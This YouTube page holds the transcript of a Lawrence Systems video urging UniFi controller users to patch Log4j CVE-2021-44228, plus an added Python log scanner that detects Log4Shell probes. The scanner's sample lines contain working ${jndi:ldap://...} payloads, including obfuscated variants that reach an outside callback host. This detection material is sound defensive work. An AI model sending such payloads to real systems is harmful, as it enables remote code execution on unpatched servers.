Patching UniFi Against The Log4J CVE-2021-44228 Vulnerability

Captions
Tom here from Lawrence Systems, and if you're not running at least UniFi controller version 6.5.54, you are vulnerable to CVE-2021-44228, or the Log4j problem that's going around right now in December of 2021. Quick explainer: Log4j is a logging facility for Java applications, if you don't want to write your own logging facility to standard output or use some special tool. It does not have proper input standardization, which allows for remote code execution just from parsing the log. So this is a logging facility that is very popular, very widely used by many, many companies, UniFi included, who wrote their controller software specifically in Java and then chose this particular tool, which unfortunately didn't input-sanitize the code. Which means if you have ports publicly exposed, such as if you have the controller hosted, well, maybe at your office like we do, and you have your different network devices outside of the network and you open ports so they can talk back in, any logging that would have been done on that port that is then parsed inside the controller would then have a problem. This also goes for if you expose the web interface, which we don't, but we do have a couple of ports open. I am not a hundred percent sure right now which ports get logging and which ones don't, because the logging port specifically is not one we open for UniFi, but it's best to get updated, because if any of these ports that are open actually pass through the Log4j process within the UniFi controller, there's a potential for that to be exploited. So if you have this completely on a closed network with nothing on the network locally that could be attacking it, and you haven't opened it, there's much less risk, but I still recommend patching. If you have this exposed because you're running it on a hosting environment, I recommend you absolutely get this patched. If you're running this on HostiFi, yes, Reilly Chase rolled out the patch immediately as soon as this came out.

Ubiquiti was very quick to do this, and as soon as the problem was made aware to the greater security teams and everything out there and a patch was available, they were quick and on top of it. But of course people are not always quick and on top of it, so I wanted to just tell people: get it out there, get it patched so you're not vulnerable. Now I will be leaving a link right here to the UniFi application 6.5.54. If there's a newer version when you're watching this in the future, get whatever the latest version is, but this is just them talking about it, and as I said they were very quick to be on top of this. But I also want to mention the new security bulletin that came out today, on December 13th. It is a little different, but not anything different you have to worry about if you've already patched and loaded that version; this is just more the official write-up on here, talking about just how bad it is, because as we triage this, as we get a better understanding of the severity of this vulnerability, it was really bad, as what we thought in the beginning, and it's proved three days later to be really, really bad.

All right, next thing I want to mention is this right here: someone asked me about Log4j attacks on UniFi cameras. UniFi Protect, which is the current camera system offered by UniFi, does not run on Java, therefore is not vulnerable, so this appears to be a false positive, and that is me commenting right here that it's a false positive. This has also been posted over in the Ubiquiti forums; I'll leave a link to this as well, and same thing, Ubiquiti's saying we don't run this on here. This is UI-Marcus; I believe he's one of the security people on there. If I click that it might tell me, but nonetheless, it is really important to remember, let's focus on what's important: the UniFi Protect system doesn't run on Java, therefore it's not really a concern in terms of this particular vulnerability. But if you're running the old system, there's a very strong likelihood that it is vulnerable to that, and it's end of life, which is the old UniFi Video that was end-of-lifed a while ago. If you're running that, sorry, there's no patch for it. If you do some digging around you'll actually find some people discussing ways to patch it; I've seen that in different forums, but I don't know if any of them are good, so I'm not going to post a link to them, as I've not vetted them. I don't have anybody running UniFi Video.

Now we updated our controller to 6.5.54. There's a couple of other things I wanted to talk about real quick, and that is hopefully to answer the question of: were you compromised? Now this is not something that affects the access points themselves; it's all based on the controller, because the access points or the switches do not run Java. But if you do have these controllers publicly exposed, there is a risk. Well, we use a tool called Graylog, which I've talked about on my channel before, and Graylog is a full logging system. By going through our logs we were able to see that there were actually no attempts with that particular string until December 13th, and we patched the day the UniFi controller came out, which was on December 10th, so we patched right away. I can go through the logs; there's actually no logs showing anyone trying to use that exploit for the last couple of days, and then all of a sudden this morning I saw a few of them start hitting. Now, seeing this in your logs is not an indication of compromise. It is an attempt, but that attempt, if it doesn't have anywhere to go, doesn't go anywhere. For example, looking at my web server logs, I did see right away on my forums, for example, quite a few attempts on there. Nothing on my forums runs anything Java with Log4j in it, therefore none of my forums were, you know, anything more than just an annoyance to see it all in the logs on there. So seeing the logs is not an indicator of compromise, but seeing that can be, you know, scary when you start seeing, oh my gosh, my logs are filled with that. If you don't have any vulnerable applications, they're just noise in the logs, and they just return 404 pages for people sending them over to my web server, because there's nothing there to see.

If you are really being a little bit more cautious and you think maybe you were compromised, because you're watching this in the future and there's a lot of attacks out there, you can take a backup of UniFi. Hopefully, to my knowledge at this time, there's no way to infect the backup itself. You would download the backup, reload the controller and restore the backup, and that should be able to do it, and just destroy whatever machine that was running on. So hopefully these are enough steps to mitigate this. I will do updated videos if there's something more we know in the future. Right now it's just everything's on fire, and let's get this patched as fast as we can to avoid more things catching on fire in the future. And we already know there will always be some people out there that have got these servers running and it's "not broke, don't fix it" until something more severe comes along and leverages this to stack it with some other vulnerabilities to create something, well, really terrible: either a whole lot of crypto miners running or maybe some type of new botnet attack that'll come out of this, because there's so many things vulnerable to this, not just UniFi. But nonetheless, please get patching on this so you're not part of the problem. Thanks.

And thank you for making it all the way to the end of this video. If you've enjoyed the content, please give us a thumbs up. If you would like to see more content from this channel, hit the subscribe button and the bell icon. If you'd like to hire us for a project, head over to lawrencesystems.com and click the Hire Us button right at the top. To help this channel out in other ways, there's a join button here for YouTube and a Patreon page where your support is greatly appreciated. For deals, discounts and offers, check out our affiliate links in the description of all of our videos, including a link to our shirt store where we have a wide variety of shirts that we sell, and designs come out, well, randomly, so check back frequently. And finally, our forums, forums.lawrencesystems.com, is where you can have a more in-depth discussion about this video and other tech topics covered on this channel. Thanks again for watching and look forward to hearing from you.
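The log review the video describes (searching Graylog and web-server logs for the exploit string, and reading a hit as an attempt rather than a compromise) can be scripted. The following is an added example, not code from the video, from Lawrence Systems or from Ubiquiti. It scans constructed Apache/Nginx combined-format log lines for `${jndi:` probes, first undoing URL-encoding and the `${lower:...}` / `${::-...}` lookup obfuscations attackers use to slip past a plain search for "jndi", then lists the scheme and callback host of each probe. The log lines, addresses, ports and paths are made up for the example.

```python
"""Scan web-server (or Graylog-exported) log lines for Log4Shell probes.

Added example, not code from the video or from Lawrence Systems. A hit means
someone *sent* a CVE-2021-44228 payload, not that anything was exploited:
a host with no Log4j-backed Java application just logs it and returns a 404.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Nginx "combined" format. The addresses,
# ports and paths are invented; the payload shapes mirror common in-the-wild forms.
SAMPLE_LOG_LINES = [
    # 1. Plain payload in the User-Agent header
    '203.0.113.5 - - [13/Dec/2021:08:12:01 +0000] "GET / HTTP/1.1" 404 153 "-" '
    '"${jndi:ldap://203.0.113.99:1389/a}"',
    # 2. ${lower:x} lookups hide the literal "jndi" and "ldap"
    '203.0.113.6 - - [13/Dec/2021:08:12:07 +0000] "GET /forums/ HTTP/1.1" 404 153 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.99:1389/a}"',
    # 3. URL-encoded payload in the query string
    '203.0.113.7 - - [13/Dec/2021:08:13:44 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.99%3A1099%2Fa%7D HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    # 4. ${::-x} "default value" lookups spell the keyword one letter at a time
    '203.0.113.8 - - [13/Dec/2021:08:15:30 +0000] "GET / HTTP/1.1" 404 153 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99:1389/a}"',
    # 5. Benign traffic (a device inform, which is what the controller normally sees)
    '198.51.100.2 - - [13/Dec/2021:08:14:00 +0000] "GET /inform HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x}  ->  x
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x}  ->  x   (covers ${::-x} and ${env:NOPE:-x})
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The de-obfuscated probe: scheme and callback host[:port]
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 5) -> str:
    """Peel off URL-encoding and Log4j lookup tricks until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = LOOKUP_CASE.sub(lambda m: m.group(1), text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_log4shell_probes(lines):
    """Return one dict per line that carries a ${jndi:...} payload after normalisation."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI.search(normalize(line))
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),   # ldap, rmi, dns, ...
                "callback": match.group(2),          # attacker's listener host:port
                "raw": line,
            })
    return hits


def callback_hosts(hits):
    """Distinct listener hosts, e.g. to feed a firewall block list (IPv4/hostnames only)."""
    return sorted({h["callback"].rsplit(":", 1)[0] for h in hits})


if __name__ == "__main__":
    found = find_log4shell_probes(SAMPLE_LOG_LINES)
    for h in found:
        print(f'line {h["line"]}: {h["scheme"]} callback {h["callback"]}')
    print("callback hosts:", callback_hosts(found))
```

Run against the built-in sample, lines 1 to 4 are reported and the benign inform request is not. The normalisation step is the part worth copying: a Graylog search for the bare word "jndi" matches only the first sample line, while lines 2 and 4 reach a vulnerable Log4j just the same because the lookups are resolved before the `${jndi:` string is evaluated. As the video says, a hit in these logs only tells you a payload arrived; whether it did anything depends on whether a Log4j 2 application actually parsed it.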
Info
Channel: Lawrence Systems
Views: 5,500
Keywords: LawrenceSystems, unifi network upgrade, ubiquiti unifi, unifi 6.5.54, unifi controller, unifi controller setup, unifi controller update, unifi controller software, unifi log4j, unifi log for shell, unifi log4j mitigation, log4j mitigation, log4j2 mitigation, log4j migration steps
Id: _sC7ntv0PUY
Length: 7min 36sec (456 seconds)
Published: Mon Dec 13 2021